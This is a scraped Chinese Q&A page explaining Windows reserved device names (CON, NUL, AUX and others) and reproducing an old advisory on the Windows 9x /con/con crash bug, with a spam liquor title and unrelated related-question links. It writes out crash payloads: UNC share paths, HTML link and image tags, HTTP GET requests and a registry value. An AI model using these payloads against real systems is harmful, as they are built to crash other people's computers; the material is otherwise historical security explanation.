茅台北京军区专供真假:为什么windows里不能建立文件名为con的任何文件和文件夹?

来源:百度文库 编辑:神马品牌网 时间:2024/05/09 03:42:12
为什么windows里不能建立文件名为con的任何文件和文件夹?

知道CON是DOS下的特殊设备名

如下由系统保留的设备名字不能用作文件名:
CON,PRN,AUX,CLOCK$,NUL,COM1,COM2,COM3,COM4,COM5,COM6,COM7,COM8,COM9,LPT1

真的耶。。。。。。。。。。

Windows 9X 的 /con/con 设备名称解析漏洞 (MS,缺陷)

涉及程序:
Microsoft Windows9x

描述:
Windows 9X 的 /con/con 设备名称解析漏洞允许用户远程攻击,导致windows98系统崩溃

详细:
请求访问系统上一些包含设备名的非法路径,这将导致windows9x崩溃。当windows解析这些路径时,内核的溢出导致整个系统出错。这时你只有重新启动系统才能恢复正常,没有其它的选择。
发现有五个设备或设备驱动程序可以使系统崩溃。它们是:
CON、NUL、AUX、CLOCK$、CONFIG$,其它的设备如 LPTx和COMx 则不行。
把这些组合起来形成一个路径,如: CON\NUL, NUL\CON, AUX\NUL,只要请求成功,windows系统将崩溃。

下面是在 IO.SYS 里面关于这些设备的定义:

DEVICE DRIVERS
--------------
These are specified in IO.SYS and date back from the early Ms Dos
days. Here is what I have found. Here is a brief list;

CLOCK$ - System clock
CON - Console; combination of keyboard and screen to
handle input and output
AUX or COM1 - First serial communicationport
NUL - Dummy port, or the "null device" which we all
know under Linux as /dev/null.
CONFIG$ - Unknown

只要能对这些路径进行请求,不管是远程,还是本地,都可以令系统崩溃,下面是几种方式:

(1)如果目标机器上存在共享,不管该共享资源有没有设置密码,都可以用这个办法使系统当机:
比如机器192.168.0.2上有一个名称为d的共享,则在"运行"中输入下面的命令可以使目标windows9x系统崩溃:
\\192.168.0.2\d\nul\nul
唯一的要求是兰色字的必须是正确的路径,否则无效
在网上有大量的windows95/98的机器,其打印机共享是打开的。这个共享是入侵windows95/98的入口,通常它对应 c:\windows\system
属于只读共享。
这种攻击方式对这类机器是很有效的:
\\192.168.0.2\printer$\nul\nul

(2) 制作包含下列HTML代码的一个网页,通过邮件方式(outlook)或者浏览器设法让攻击目标打开

<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>

(3) 如果攻击目标上安装了web server,如Microsoft Person web server,或者Frontpage Extention Server,用:
"Get /con/con" 或者 "Get nul/nul" 的请求,就可以远程当掉 windows 系统,比如:
http://xxx.xxx.xxx.xxx/nul/nul
如果目标上安装了FTP server,也可以使用上述 GET 命令来达到目的。

(4) 在注册表的: Inserting HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\_ 项,用
c:\con\con "%1" %* or c:\nul\nul "%1" %* 的值,也可以使系统当机。这是宏病毒的一种常用攻击方式。

(5)下面的HTML代码也可以达到目的:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>

以上的情况只适用于IE浏览器。

下面列出一个利用这个溢出造成windows95/98/SE系统崩溃的程序,要求目标上安装有web server
flog.c

不知道

为什么windows里不能建立文件名为con的任何文件和文件夹?? 为什么windows里不能建立文件名为con的任何文件和文件夹? 为什么我不能删除C盘里的应用文件? 病毒在我的电脑C:\WINDOWS\system32里有一个名为winpub.reg的文件每次我删除了开机又有了 WINDOWS2000PROFESSIONAL为什么不能播放拓展名为RM的文件 C盘里的WINDOWS文件删除 C:\WINDOWS有一个名为 ala2qq 的文件,这是什么? C:\WINDOWS有一个名为 ala2qq 的文件,这是什么?? 请问C盘里的文件名为RRUbackups的文件是干吗用的? 请教PC高手 为什么在Windows下不能复制C盘系统文件?